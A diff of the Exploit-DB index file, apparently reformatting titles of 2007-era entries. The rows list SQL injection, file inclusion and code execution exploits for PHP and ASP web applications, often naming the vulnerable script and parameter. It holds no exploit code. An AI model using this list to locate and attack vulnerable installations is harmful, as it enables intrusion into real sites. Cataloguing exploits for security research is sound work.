+3346,platforms/php/webapps/3346.pl,"PHP-Nuke 8.0 Final - HTTP Referers SQL Injection",2007-02-20,krasza,php,webapps,0 +3348,platforms/php/webapps/3348.txt,"SendStudio 2004.14 - 'ROOTDIR' Remote File Inclusion",2007-02-20,K-159,php,webapps,0 3351,platforms/php/webapps/3351.pl,"webSPELL 4.01.02 - 'topic' SQL Injection",2007-02-21,DNX,php,webapps,0 3352,platforms/php/webapps/3352.php,"Connectix Boards 0.7 - 'p_skin' Multiple Vulnerabilities",2007-02-21,DarkFig,php,webapps,0 -3353,platforms/php/webapps/3353.txt,"DBImageGallery 1.2.2 - (donsimg_base_path) Remote File Inclusion",2007-02-21,Denven,php,webapps,0 -3354,platforms/php/webapps/3354.txt,"DBGuestbook 1.1 - (dbs_base_path) Remote File Inclusion",2007-02-21,Denven,php,webapps,0 -3355,platforms/php/webapps/3355.php,"Nabopoll 1.2 - 'result.php surv' Blind SQL Injection",2007-02-21,s0cratex,php,webapps,0 +3353,platforms/php/webapps/3353.txt,"DBImageGallery 1.2.2 - 'donsimg_base_path' Remote File Inclusion",2007-02-21,Denven,php,webapps,0 +3354,platforms/php/webapps/3354.txt,"DBGuestbook 1.1 - 'dbs_base_path' Remote File Inclusion",2007-02-21,Denven,php,webapps,0 +3355,platforms/php/webapps/3355.php,"Nabopoll 1.2 - 'result.php?surv' Blind SQL Injection",2007-02-21,s0cratex,php,webapps,0 3357,platforms/php/webapps/3357.txt,"DZCP (deV!L_z Clanportal) 1.4.5 - Remote File Disclosure",2007-02-21,Kiba,php,webapps,0 -3360,platforms/php/webapps/3360.txt,"FlashGameScript 1.5.4 - 'index.php func' Remote File Inclusion",2007-02-22,JuMp-Er,php,webapps,0 +3360,platforms/php/webapps/3360.txt,"FlashGameScript 1.5.4 - 'index.php?func' Remote File Inclusion",2007-02-22,JuMp-Er,php,webapps,0 3361,platforms/php/webapps/3361.txt,"eFiction 3.1.1 - 'path_to_smf' Remote File Inclusion",2007-02-22,"ThE dE@Th",php,webapps,0 -3365,platforms/php/webapps/3365.txt,"FCRing 1.31 - 'fcring.php s_fuss' Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0 -3366,platforms/php/webapps/3366.txt,"Sinapis 2.2 Gastebuch - 'sinagb.php fuss' Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0 -3367,platforms/php/webapps/3367.txt,"Sinapis Forum 2.2 - 'sinapis.php fuss' Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0 +3365,platforms/php/webapps/3365.txt,"FCRing 1.31 - 'fcring.php?s_fuss' Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0 +3366,platforms/php/webapps/3366.txt,"Sinapis 2.2 Gastebuch - 'sinagb.php?fuss' Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0 +3367,platforms/php/webapps/3367.txt,"Sinapis Forum 2.2 - 'sinapis.php?fuss' Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0 3370,platforms/php/webapps/3370.pl,"Extreme phpBB 3.0.1 - 'functions.php' Remote File Inclusion",2007-02-24,"Mehmet Ince",php,webapps,0 3371,platforms/php/webapps/3371.php,"Coppermine Photo Gallery 1.3.x - Blind SQL Injection",2007-02-24,s0cratex,php,webapps,0 -3372,platforms/php/webapps/3372.php,"CS-Gallery 2.0 - 'index.php album' Remote File Inclusion",2007-02-24,burncycle,php,webapps,0 +3372,platforms/php/webapps/3372.php,"CS-Gallery 2.0 - 'index.php?album' Remote File Inclusion",2007-02-24,burncycle,php,webapps,0 3373,platforms/php/webapps/3373.pl,"phpBB Module NoMoKeTos Rules 0.0.1 - Remote File Inclusion",2007-02-24,bd0rk,php,webapps,0 -3374,platforms/php/webapps/3374.txt,"PHP-MIP 0.1 - 'top.php laypath' Remote File Inclusion",2007-02-25,GoLd_M,php,webapps,0 +3374,platforms/php/webapps/3374.txt,"PHP-MIP 0.1 - 'top.php?laypath' Remote File Inclusion",2007-02-25,GoLd_M,php,webapps,0 3379,platforms/php/webapps/3379.php,"STWC-Counter 3.4.0 - 'downloadcounter.php' Remote File Inclusion",2007-02-26,burncycle,php,webapps,0 -3382,platforms/php/webapps/3382.txt,"Admin Phorum 3.3.1a - 'del.php include_path' Remote File Inclusion",2007-02-27,GoLd_M,php,webapps,0 -3387,platforms/php/webapps/3387.php,"vBulletin 3.6.4 - 'inlinemod.php postids' SQL Injection",2007-02-28,rgod,php,webapps,0 +3382,platforms/php/webapps/3382.txt,"Admin Phorum 3.3.1a - 'del.php?include_path' Remote File Inclusion",2007-02-27,GoLd_M,php,webapps,0 +3387,platforms/php/webapps/3387.php,"vBulletin 3.6.4 - 'inlinemod.php?postids' SQL Injection",2007-02-28,rgod,php,webapps,0 3390,platforms/asp/webapps/3390.txt,"Angel Lms 7.1 - 'default.asp id' SQL Injection",2007-03-01,"Craig Heffner",asp,webapps,0 3393,platforms/php/webapps/3393.php,"phpMyFAQ 1.6.7 - SQL Injection / Command Execution",2007-03-01,elgCrew,php,webapps,0 39567,platforms/php/webapps/39567.txt,"Monstra CMS 3.0.3 - Multiple Vulnerabilities",2016-03-16,"Sarim Kiani",php,webapps,80 -3398,platforms/php/webapps/3398.txt,"Mani Stats Reader 1.2 - (ipath) Remote File Inclusion",2007-03-02,mozi,php,webapps,0 +3398,platforms/php/webapps/3398.txt,"Mani Stats Reader 1.2 - 'ipath' Remote File Inclusion",2007-03-02,mozi,php,webapps,0 3400,platforms/php/webapps/3400.pl,"webSPELL 4.01.02 - Multiple SQL Injections",2007-03-02,DNX,php,webapps,0 3402,platforms/php/webapps/3402.php,"webSPELL 4.01.02 - PHP Remote Code Execution",2007-03-03,DarkFig,php,webapps,0 3403,platforms/php/webapps/3403.php,"Rigter Portal System (RPS) 6.2 - Blind SQL Injection",2007-03-04,s0cratex,php,webapps,0 -3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 - 'eintrag.php sqllog' Remote File Inclusion",2007-03-04,bd0rk,php,webapps,0 +3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 - 'eintrag.php?sqllog' Remote File Inclusion",2007-03-04,bd0rk,php,webapps,0 3408,platforms/php/webapps/3408.pl,"AJ Auction Pro - 'subcat.php' SQL Injection",2007-03-04,ajann,php,webapps,0 3409,platforms/php/webapps/3409.htm,"AJ Dating 1.0 - 'view_profile.php' SQL Injection",2007-03-04,ajann,php,webapps,0 3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 - 'postingdetails.php' SQL Injection",2007-03-04,ajann,php,webapps,0 3411,platforms/php/webapps/3411.pl,"AJ Forum 1.0 - 'topic_title.php' SQL Injection",2007-03-04,ajann,php,webapps,0 3412,platforms/cgi/webapps/3412.txt,"RRDBrowse 1.6 - Arbitrary File Disclosure",2007-03-04,"Sebastian Wolfgarten",cgi,webapps,0 -3416,platforms/php/webapps/3416.pl,"Links Management Application 1.0 - (lcnt) SQL Injection",2007-03-05,ajann,php,webapps,0 -3423,platforms/php/webapps/3423.txt,"PHP-Nuke Module PostGuestbook 0.6.1 - (tpl_pgb_moddir) Remote File Inclusion",2007-03-07,GoLd_M,php,webapps,0 +3416,platforms/php/webapps/3416.pl,"Links Management Application 1.0 - 'lcnt' SQL Injection",2007-03-05,ajann,php,webapps,0 +3423,platforms/php/webapps/3423.txt,"PHP-Nuke Module PostGuestbook 0.6.1 - 'tpl_pgb_moddir' Remote File Inclusion",2007-03-07,GoLd_M,php,webapps,0 3428,platforms/php/webapps/3428.txt,"Flat Chat 2.0 - 'include online.txt' Remote Code Execution",2007-03-07,Dj7xpl,php,webapps,0 -3435,platforms/php/webapps/3435.txt,"netForo! 0.1 - 'down.php file_to_download' Remote File Disclosure",2007-03-08,GoLd_M,php,webapps,0 +3435,platforms/php/webapps/3435.txt,"netForo! 0.1 - 'down.php?file_to_download' Remote File Disclosure",2007-03-08,GoLd_M,php,webapps,0 3436,platforms/php/webapps/3436.txt,"WEBO (Web ORGanizer) 1.0 - 'baseDir' Remote File Inclusion",2007-03-08,K-159,php,webapps,0 3437,platforms/asp/webapps/3437.txt,"GaziYapBoz Game Portal - 'kategori.asp' SQL Injection",2007-03-08,CyberGhost,asp,webapps,0 3438,platforms/php/webapps/3438.txt,"Magic CMS 4.2.747 - 'mysave.php' Remote File Inclusion",2007-03-08,DNX,php,webapps,0 3443,platforms/php/webapps/3443.txt,"PMB Services 3.0.13 - Multiple Remote File Inclusions",2007-03-09,K-159,php,webapps,0 3447,platforms/php/webapps/3447.txt,"Grayscale Blog 0.8.0 - Security Bypass / SQL Injection / Cross-Site Scripting",2007-03-09,Omni,php,webapps,0 3448,platforms/php/webapps/3448.txt,"work system E-Commerce 3.0.5 - Remote File Inclusion",2007-03-10,"Rodrigo Duarte",php,webapps,0 -3449,platforms/php/webapps/3449.txt,"HC Newssystem 1.0-1.4 - 'index.php ID' SQL Injection",2007-03-10,WiLdBoY,php,webapps,0 +3449,platforms/php/webapps/3449.txt,"HC Newssystem 1.0-1.4 - 'index.php?ID' SQL Injection",2007-03-10,WiLdBoY,php,webapps,0 3450,platforms/php/webapps/3450.php,"NukeSentinel 2.5.06 - SQL Injection",2007-03-10,DarkFig,php,webapps,0 -3454,platforms/php/webapps/3454.pl,"PostNuke Module phgstats 0.5 - (phgdir) Remote File Inclusion",2007-03-11,bd0rk,php,webapps,0 +3454,platforms/php/webapps/3454.pl,"PostNuke Module phgstats 0.5 - 'phgdir' Remote File Inclusion",2007-03-11,bd0rk,php,webapps,0 3455,platforms/php/webapps/3455.htm,"JobSitePro 1.0 - 'search.php' SQL Injection",2007-03-11,ajann,php,webapps,0 3456,platforms/php/webapps/3456.pl,"Top Auction 1.0 - 'viewcat.php' SQL Injection",2007-03-11,ajann,php,webapps,0 3457,platforms/php/webapps/3457.pl,"SonicMailer Pro 3.2.3 - 'index.php' SQL Injection",2007-03-11,ajann,php,webapps,0 @@ -18127,13 +18128,13 @@ id,file,description,date,author,platform,type,port 3459,platforms/php/webapps/3459.txt,"cPanel 10.9.x - 'Fantastico' Local File Inclusion",2007-03-11,"cyb3rt & 020",php,webapps,0 3465,platforms/php/webapps/3465.txt,"OES (Open Educational System) 0.1beta - Remote File Inclusion",2007-03-12,K-159,php,webapps,0 3466,platforms/asp/webapps/3466.txt,"BP Blog 7.0 - 'layout' SQL Injection",2007-03-12,BeyazKurt,asp,webapps,0 -3467,platforms/php/webapps/3467.txt,"GestArt Beta 1 - 'aide.php aide' Remote File Inclusion",2007-03-13,Dj7xpl,php,webapps,0 -3468,platforms/php/webapps/3468.txt,"MySQL Commander 2.7 - (home) Remote File Inclusion",2007-03-13,K-159,php,webapps,0 +3467,platforms/php/webapps/3467.txt,"GestArt Beta 1 - 'aide.php?aide' Remote File Inclusion",2007-03-13,Dj7xpl,php,webapps,0 +3468,platforms/php/webapps/3468.txt,"MySQL Commander 2.7 - 'home' Remote File Inclusion",2007-03-13,K-159,php,webapps,0 3469,platforms/asp/webapps/3469.txt,"X-ice News System 1.0 - 'devami.asp id' SQL Injection",2007-03-13,CyberGhost,asp,webapps,0 3470,platforms/asp/webapps/3470.htm,"JGBBS 3.0beta1 - 'search.asp author' SQL Injection",2007-03-13,WiLdBoY,asp,webapps,0 3471,platforms/php/webapps/3471.txt,"Activist Mobilization Platform (AMP) 3.2 - Remote File Inclusion",2007-03-13,the_day,php,webapps,0 3472,platforms/php/webapps/3472.txt,"CARE2X 1.1 - 'ROOT_PATH' Remote File Inclusion",2007-03-13,the_day,php,webapps,0 -3473,platforms/php/webapps/3473.txt,"WebCreator 0.2.6-rc3 - (moddir) Remote File Inclusion",2007-03-13,the_day,php,webapps,0 +3473,platforms/php/webapps/3473.txt,"WebCreator 0.2.6-rc3 - 'moddir' Remote File Inclusion",2007-03-13,the_day,php,webapps,0 3476,platforms/php/webapps/3476.pl,"Zomplog 3.7.6 (Windows x86) - Local File Inclusion",2007-03-14,Bl0od3r,php,webapps,0 3477,platforms/php/webapps/3477.htm,"WSN Guest 1.21 - 'id' SQL Injection",2007-03-14,WiLdBoY,php,webapps,0 3478,platforms/php/webapps/3478.htm,"Dayfox Blog 4 - 'postpost.php' Remote Code Execution",2007-03-14,Dj7xpl,php,webapps,0 @@ -18141,31 +18142,31 @@ id,file,description,date,author,platform,type,port 3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x - 'usergroups.php' SQL Injection",2007-03-15,x666,php,webapps,0 3484,platforms/php/webapps/3484.txt,"WebLog - 'index.php' Remote File Disclosure",2007-03-15,Dj7xpl,php,webapps,0 3485,platforms/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 - 'INCLUDE_PATH' Remote File Inclusion",2007-03-15,the_day,php,webapps,0 -3486,platforms/php/webapps/3486.txt,"Groupit 2.00b5 - (c_basepath) Remote File Inclusion",2007-03-15,the_day,php,webapps,0 +3486,platforms/php/webapps/3486.txt,"Groupit 2.00b5 - 'c_basepath' Remote File Inclusion",2007-03-15,the_day,php,webapps,0 3487,platforms/php/webapps/3487.pl,"CcMail 1.0.1 - 'functions_dir' Remote File Inclusion",2007-03-15,Crackers_Child,php,webapps,0 3489,platforms/php/webapps/3489.txt,"creative Guestbook 1.0 - Multiple Vulnerabilities",2007-03-15,Dj7xpl,php,webapps,0 3490,platforms/php/webapps/3490.txt,"wbblog - Cross-Site Scripting / SQL Injection",2007-03-15,"Mehmet Ince",php,webapps,0 -3492,platforms/php/webapps/3492.txt,"WebCalendar 0.9.45 - (includedir) Remote File Inclusion",2007-03-15,Drackanz,php,webapps,0 +3492,platforms/php/webapps/3492.txt,"WebCalendar 0.9.45 - 'includedir' Remote File Inclusion",2007-03-15,Drackanz,php,webapps,0 3493,platforms/asp/webapps/3493.txt,"Absolute Image Gallery 2.0 - 'gallery.asp categoryId' SQL Injection",2007-03-15,WiLdBoY,asp,webapps,0 3494,platforms/php/webapps/3494.txt,"McGallery 0.5b - 'download.php' Arbitrary File Download",2007-03-15,Piker,php,webapps,0 -3496,platforms/php/webapps/3496.php,"PHP-Stats 0.1.9.1b - (PC-REMOTE-ADDR) SQL Injection",2007-03-16,rgod,php,webapps,0 -3497,platforms/php/webapps/3497.php,"PHP-Stats 0.1.9.1b - (ip) SQL Injection",2007-03-16,rgod,php,webapps,0 +3496,platforms/php/webapps/3496.php,"PHP-Stats 0.1.9.1b - 'PC-REMOTE-ADDR' SQL Injection",2007-03-16,rgod,php,webapps,0 +3497,platforms/php/webapps/3497.php,"PHP-Stats 0.1.9.1b - 'ip' SQL Injection",2007-03-16,rgod,php,webapps,0 3498,platforms/php/webapps/3498.txt,"Creative Files 1.2 - 'kommentare.php' SQL Injection",2007-03-16,"Mehmet Ince",php,webapps,0 -3500,platforms/php/webapps/3500.htm,"Particle Blogger 1.2.0 - 'post.php postid' SQL Injection",2007-03-16,WiLdBoY,php,webapps,0 +3500,platforms/php/webapps/3500.htm,"Particle Blogger 1.2.0 - 'post.php?postid' SQL Injection",2007-03-16,WiLdBoY,php,webapps,0 3501,platforms/php/webapps/3501.txt,"PHP DB Designer 1.02 - Remote File Inclusion",2007-03-16,GoLd_M,php,webapps,0 3502,platforms/php/webapps/3502.php,"PHP-Stats 0.1.9.1b - 'PHP-stats-options.php' Admin 2 'exec()' Exploit",2007-03-17,rgod,php,webapps,0 -3503,platforms/php/webapps/3503.txt,"MPM Chat 2.5 - 'view.php logi' Local File Inclusion",2007-03-17,GoLd_M,php,webapps,0 +3503,platforms/php/webapps/3503.txt,"MPM Chat 2.5 - 'view.php?logi' Local File Inclusion",2007-03-17,GoLd_M,php,webapps,0 3504,platforms/php/webapps/3504.pl,"Active PHP Bookmark Notes 0.2.5 - Remote File Inclusion",2007-03-17,GoLd_M,php,webapps,0 3505,platforms/php/webapps/3505.php,"Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (1)",2007-03-18,DarkFig,php,webapps,0 3506,platforms/php/webapps/3506.htm,"Guestbara 1.2 - Change Admin Login and Password Exploit",2007-03-18,Kacper,php,webapps,0 3507,platforms/php/webapps/3507.pl,"ScriptMagix FAQ Builder 2.0 - 'index.php' SQL Injection",2007-03-18,ajann,php,webapps,0 -3508,platforms/php/webapps/3508.txt,"Moodle 1.5.2 - (moodledata) Remote Session Disclosure",2007-03-18,xSh,php,webapps,0 -3509,platforms/php/webapps/3509.pl,"ScriptMagix Jokes 2.0 - 'index.php catid' SQL Injection",2007-03-18,ajann,php,webapps,0 -3510,platforms/php/webapps/3510.pl,"ScriptMagix Recipes 2.0 - 'index.php catid' SQL Injection",2007-03-18,ajann,php,webapps,0 +3508,platforms/php/webapps/3508.txt,"Moodle 1.5.2 - 'moodledata' Remote Session Disclosure",2007-03-18,xSh,php,webapps,0 +3509,platforms/php/webapps/3509.pl,"ScriptMagix Jokes 2.0 - 'index.php?catid' SQL Injection",2007-03-18,ajann,php,webapps,0 +3510,platforms/php/webapps/3510.pl,"ScriptMagix Recipes 2.0 - 'index.php?catid' SQL Injection",2007-03-18,ajann,php,webapps,0 3511,platforms/php/webapps/3511.pl,"ScriptMagix Photo Rating 2.0 - SQL Injection",2007-03-18,ajann,php,webapps,0 3512,platforms/php/webapps/3512.txt,"PHP-Nuke - 'iframe.php' Remote File Inclusion",2007-03-18,"Cold Zero",php,webapps,0 3513,platforms/php/webapps/3513.php,"Katalog Plyt Audio (pl) 1.0 - SQL Injection",2007-03-18,Kacper,php,webapps,0 -3515,platforms/php/webapps/3515.pl,"ScriptMagix Lyrics 2.0 - 'index.php recid' SQL Injection",2007-03-19,ajann,php,webapps,0 +3515,platforms/php/webapps/3515.pl,"ScriptMagix Lyrics 2.0 - 'index.php?recid' SQL Injection",2007-03-19,ajann,php,webapps,0 3516,platforms/php/webapps/3516.php,"MetaForum 0.513 Beta - Arbitrary File Upload",2007-03-19,Gu1ll4um3r0m41n,php,webapps,0 3518,platforms/php/webapps/3518.pl,"PHP-Nuke Module splattforum 4.0 RC1 - Local File Inclusion",2007-03-19,GoLd_M,php,webapps,0 3519,platforms/php/webapps/3519.txt,"phpBB Minerva Mod 2.0.21 build 238a - SQL Injection",2007-03-19,"Mehmet Ince",php,webapps,0 @@ -18173,19 +18174,19 @@ id,file,description,date,author,platform,type,port 3521,platforms/php/webapps/3521.pl,"pragmaMX Module Landkarten 2.1 (Windows) - Local File Inclusion",2007-03-19,bd0rk,php,webapps,0 3522,platforms/php/webapps/3522.pl,"GeBlog 0.1 (Windows) - GLOBALS[tplname] Local File Inclusion",2007-03-20,GoLd_M,php,webapps,0 3524,platforms/php/webapps/3524.txt,"PHP-Nuke Module htmltonuke 2.0alpha - 'htmltonuke.php' Remote File Inclusion",2007-03-20,"Cold Zero",php,webapps,0 -3528,platforms/php/webapps/3528.pl,"PHPRaid < 3.0.7 - 'rss.php PHPraid_dir' Remote File Inclusion",2007-03-20,"Cold Zero",php,webapps,0 -3530,platforms/php/webapps/3530.pl,"Monster Top List 1.4.2 - 'functions.php root_path' Remote File Inclusion",2007-03-20,fluffy_bunny,php,webapps,0 +3528,platforms/php/webapps/3528.pl,"PHPRaid < 3.0.7 - 'rss.php?PHPraid_dir' Remote File Inclusion",2007-03-20,"Cold Zero",php,webapps,0 +3530,platforms/php/webapps/3530.pl,"Monster Top List 1.4.2 - 'functions.php?root_path' Remote File Inclusion",2007-03-20,fluffy_bunny,php,webapps,0 3532,platforms/php/webapps/3532.txt,"study planner (studiewijzer) 0.15 - Remote File Inclusion",2007-03-21,K-159,php,webapps,0 3533,platforms/php/webapps/3533.txt,"Digital Eye CMS 0.1.1b - 'module.php' Remote File Inclusion",2007-03-21,"Cold Zero",php,webapps,0 3534,platforms/asp/webapps/3534.txt,"Active Link Engine - 'default.asp catid' SQL Injection",2007-03-21,CyberGhost,asp,webapps,0 3536,platforms/asp/webapps/3536.txt,"Active Photo Gallery - 'catid' SQL Injection",2007-03-21,CyberGhost,asp,webapps,0 3538,platforms/php/webapps/3538.txt,"PHP-revista 1.1.2 - Multiple SQL Injections",2007-03-21,"Cold Zero",php,webapps,0 3539,platforms/php/webapps/3539.txt,"Mambo Component nfnaddressbook 0.4 - Remote File Inclusion",2007-03-21,"Cold Zero",php,webapps,0 -3542,platforms/php/webapps/3542.txt,"ClassWeb 2.0.3 - (BASE) Remote File Inclusion",2007-03-22,GoLd_M,php,webapps,0 +3542,platforms/php/webapps/3542.txt,"ClassWeb 2.0.3 - 'BASE' Remote File Inclusion",2007-03-22,GoLd_M,php,webapps,0 3543,platforms/php/webapps/3543.pl,"PortailPhp 2.0 - 'idnews' SQL Injection",2007-03-22,"Mehmet Ince",php,webapps,0 3545,platforms/php/webapps/3545.txt,"Lms 1.8.9 - Vala Remote File Inclusion",2007-03-22,Kacper,php,webapps,0 3546,platforms/asp/webapps/3546.txt,"AspWebCalendar 4.5 - 'eventid' SQL Injection",2007-03-22,parad0x,asp,webapps,0 -3548,platforms/php/webapps/3548.pl,"RoseOnlineCMS 3 beta2 - (op) Local File Inclusion",2007-03-23,GoLd_M,php,webapps,0 +3548,platforms/php/webapps/3548.pl,"RoseOnlineCMS 3 beta2 - 'op' Local File Inclusion",2007-03-23,GoLd_M,php,webapps,0 3549,platforms/asp/webapps/3549.txt,"Active Trade 2 - 'catid' SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 3550,platforms/asp/webapps/3550.txt,"ActiveBuyandSell 6.2 - 'buyersend.asp catid' SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 3551,platforms/asp/webapps/3551.txt,"Active Auction Pro 7.1 - 'default.asp catid' SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 @@ -18193,43 +18194,43 @@ id,file,description,date,author,platform,type,port 3556,platforms/asp/webapps/3556.htm,"Active NewsLetter 4.3 - 'ViewNewspapers.asp' SQL Injection",2007-03-23,ajann,asp,webapps,0 3557,platforms/php/webapps/3557.txt,"Joomla! / Mambo Component SWmenu 4.0 - Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0 3558,platforms/asp/webapps/3558.htm,"eWebquiz 8 - 'eWebQuiz.asp' SQL Injection",2007-03-23,ajann,asp,webapps,0 -3560,platforms/php/webapps/3560.txt,"Joomla! Component Joomlaboard 1.1.1 - (sbp) Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0 -3562,platforms/php/webapps/3562.txt,"Net-Side.net CMS - 'index.php cms' Remote File Inclusion",2007-03-24,Sharingan,php,webapps,0 -3563,platforms/php/webapps/3563.txt,"ttCMS 4 - 'ez_sql.php lib_path' Remote File Inclusion",2007-03-24,Kacper,php,webapps,0 +3560,platforms/php/webapps/3560.txt,"Joomla! Component Joomlaboard 1.1.1 - 'sbp' Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0 +3562,platforms/php/webapps/3562.txt,"Net-Side.net CMS - 'index.php?cms' Remote File Inclusion",2007-03-24,Sharingan,php,webapps,0 +3563,platforms/php/webapps/3563.txt,"ttCMS 4 - 'ez_sql.php?lib_path' Remote File Inclusion",2007-03-24,Kacper,php,webapps,0 3564,platforms/php/webapps/3564.pl,"Joomla! Component Car Manager 1.1 - SQL Injection",2007-03-24,ajann,php,webapps,0 3565,platforms/php/webapps/3565.pl,"Joomla! Component RWCards 2.4.3 - SQL Injection",2007-03-24,ajann,php,webapps,0 3567,platforms/php/webapps/3567.pl,"Mambo Module Flatmenu 1.07 - Remote File Inclusion",2007-03-25,"Cold Zero",php,webapps,0 -3568,platforms/php/webapps/3568.txt,"Free Image Hosting 2.0 - (AD_BODY_TEMP) Remote File Inclusion",2007-03-25,Crackers_Child,php,webapps,0 +3568,platforms/php/webapps/3568.txt,"Free Image Hosting 2.0 - 'AD_BODY_TEMP' Remote File Inclusion",2007-03-25,Crackers_Child,php,webapps,0 3569,platforms/php/webapps/3569.pl,"PBlang 4.66z - Remote Create Admin Exploit",2007-03-25,Hessam-x,php,webapps,0 3574,platforms/php/webapps/3574.pl,"PBlang 4.66z - Remote Code Execution",2007-03-25,Hessam-x,php,webapps,0 3580,platforms/php/webapps/3580.pl,"IceBB 1.0-rc5 - Remote Create Admin Exploit",2007-03-26,Hessam-x,php,webapps,0 3581,platforms/php/webapps/3581.pl,"IceBB 1.0-rc5 - Remote Code Execution",2007-03-26,Hessam-x,php,webapps,0 3582,platforms/php/webapps/3582.pl,"PHP-Nuke Module AddressBook 1.2 - Local File Inclusion",2007-03-26,bd0rk,php,webapps,0 3583,platforms/php/webapps/3583.txt,"C-Arbre 0.6PR7 - 'ROOT_PATH' Remote File Inclusion",2007-03-26,K-159,php,webapps,0 -3588,platforms/php/webapps/3588.pl,"XOOPS module Articles 1.02 - 'print.php id' SQL Injection",2007-03-27,WiLdBoY,php,webapps,0 +3588,platforms/php/webapps/3588.pl,"XOOPS module Articles 1.02 - 'print.php?id' SQL Injection",2007-03-27,WiLdBoY,php,webapps,0 3590,platforms/php/webapps/3590.htm,"Joomla! Component D4JeZine 2.8 - Blind SQL Injection",2007-03-27,ajann,php,webapps,0 3591,platforms/php/webapps/3591.txt,"PHP-Nuke Module Eve-Nuke 0.1 - 'mysql.php' Remote File Inclusion",2007-03-27,"ThE TiGeR",php,webapps,0 3592,platforms/php/webapps/3592.htm,"Web Content System 2.7.1 - Remote File Inclusion",2007-03-27,kezzap66345,php,webapps,0 -3594,platforms/php/webapps/3594.pl,"XOOPS module Articles 1.03 - 'index.php cat_id' SQL Injection",2007-03-28,ajann,php,webapps,0 +3594,platforms/php/webapps/3594.pl,"XOOPS module Articles 1.03 - 'index.php?cat_id' SQL Injection",2007-03-28,ajann,php,webapps,0 3596,platforms/php/webapps/3596.txt,"iPhotoAlbum 1.1 - 'header.php' Remote File Inclusion",2007-03-28,GoLd_M,php,webapps,0 -3597,platforms/php/webapps/3597.pl,"XOOPS Module Friendfinder 3.3 - 'view.php id' SQL Injection",2007-03-28,ajann,php,webapps,0 +3597,platforms/php/webapps/3597.pl,"XOOPS Module Friendfinder 3.3 - 'view.php?id' SQL Injection",2007-03-28,ajann,php,webapps,0 3598,platforms/php/webapps/3598.txt,"MangoBery CMS 0.5.5 - 'quotes.php' Remote File Inclusion",2007-03-28,kezzap66345,php,webapps,0 3599,platforms/php/webapps/3599.txt,"CodeBB 1.0 Beta 2 - 'phpbb_root_path' Remote File Inclusion",2007-03-28,"Alkomandoz Hacker",php,webapps,0 -3600,platforms/php/webapps/3600.txt,"Softerra Time-Assistant 6.2 - (inc_dir) Remote File Inclusion",2007-03-29,K-159,php,webapps,0 +3600,platforms/php/webapps/3600.txt,"Softerra Time-Assistant 6.2 - 'inc_dir' Remote File Inclusion",2007-03-29,K-159,php,webapps,0 3601,platforms/php/webapps/3601.pl,"sBLOG 0.7.3 Beta - '/inc/lang.php' Local File Inclusion",2007-03-29,GoLd_M,php,webapps,0 3603,platforms/php/webapps/3603.pl,"XOOPS Module MyAds Bug Fix 2.04jp - 'index.php' SQL Injection",2007-03-29,ajann,php,webapps,0 -3605,platforms/php/webapps/3605.php,"Picture-Engine 1.2.0 - 'wall.php cat' SQL Injection",2007-03-29,Kacper,php,webapps,0 +3605,platforms/php/webapps/3605.php,"Picture-Engine 1.2.0 - 'wall.php?cat' SQL Injection",2007-03-29,Kacper,php,webapps,0 3607,platforms/php/webapps/3607.txt,"Kaqoo Auction - 'install_root' Multiple Remote File Inclusions",2007-03-29,"ThE dE@Th",php,webapps,0 -3608,platforms/php/webapps/3608.txt,"Advanced Login 0.7 - (root) Remote File Inclusion",2007-03-29,Bithedz,php,webapps,0 +3608,platforms/php/webapps/3608.txt,"Advanced Login 0.7 - 'root' Remote File Inclusion",2007-03-29,Bithedz,php,webapps,0 3611,platforms/php/webapps/3611.txt,"JC URLShrink 1.3.1 - Remote Code Execution",2007-03-30,Dj7xpl,php,webapps,0 3612,platforms/php/webapps/3612.pl,"XOOPS Module Repository - 'viewcat.php' SQL Injection",2007-03-30,ajann,php,webapps,0 3613,platforms/php/webapps/3613.txt,"phpBB MOD Forum picture and META tags 1.7 - Remote File Inclusion",2007-03-30,bd0rk,php,webapps,0 -3614,platforms/php/webapps/3614.txt,"JSBoard 2.0.10 - 'login.php table' Local File Inclusion",2007-03-30,GoLd_M,php,webapps,0 +3614,platforms/php/webapps/3614.txt,"JSBoard 2.0.10 - 'login.php?table' Local File Inclusion",2007-03-30,GoLd_M,php,webapps,0 3618,platforms/php/webapps/3618.htm,"XOOPS Module Lykos Reviews 1.00 - 'index.php' SQL Injection",2007-03-31,ajann,php,webapps,0 3619,platforms/php/webapps/3619.pl,"XOOPS Module Library - 'viewcat.php' SQL Injection",2007-03-31,ajann,php,webapps,0 3620,platforms/php/webapps/3620.pl,"XOOPS Module Core - 'viewcat.php' SQL Injection",2007-03-31,ajann,php,webapps,0 3621,platforms/php/webapps/3621.pl,"XOOPS Module Tutoriais - 'viewcat.php' SQL Injection",2007-03-31,ajann,php,webapps,0 -3622,platforms/php/webapps/3622.php,"WinMail Server 4.4 build 1124 - (WebMail) Remote Add Super User Exploit",2007-04-01,rgod,php,webapps,0 +3622,platforms/php/webapps/3622.php,"WinMail Server 4.4 build 1124 - 'WebMail' Remote Add Super User Exploit",2007-04-01,rgod,php,webapps,0 3623,platforms/php/webapps/3623.pl,"XOOPS Module eCal 2.24 - 'display.php' SQL Injection",2007-04-01,ajann,php,webapps,0 3624,platforms/php/webapps/3624.txt,"BT-sondage 1.12 - 'gestion_sondage.php' Remote File Inclusion",2007-04-01,Crackers_Child,php,webapps,0 3625,platforms/php/webapps/3625.pl,"XOOPS Module Tiny Event 1.01 - 'id' SQL Injection",2007-04-01,ajann,php,webapps,0 @@ -18248,43 +18249,43 @@ id,file,description,date,author,platform,type,port 3645,platforms/php/webapps/3645.htm,"XOOPS Module XFsection 1.07 - 'articleId' Blind SQL Injection",2007-04-02,ajann,php,webapps,0 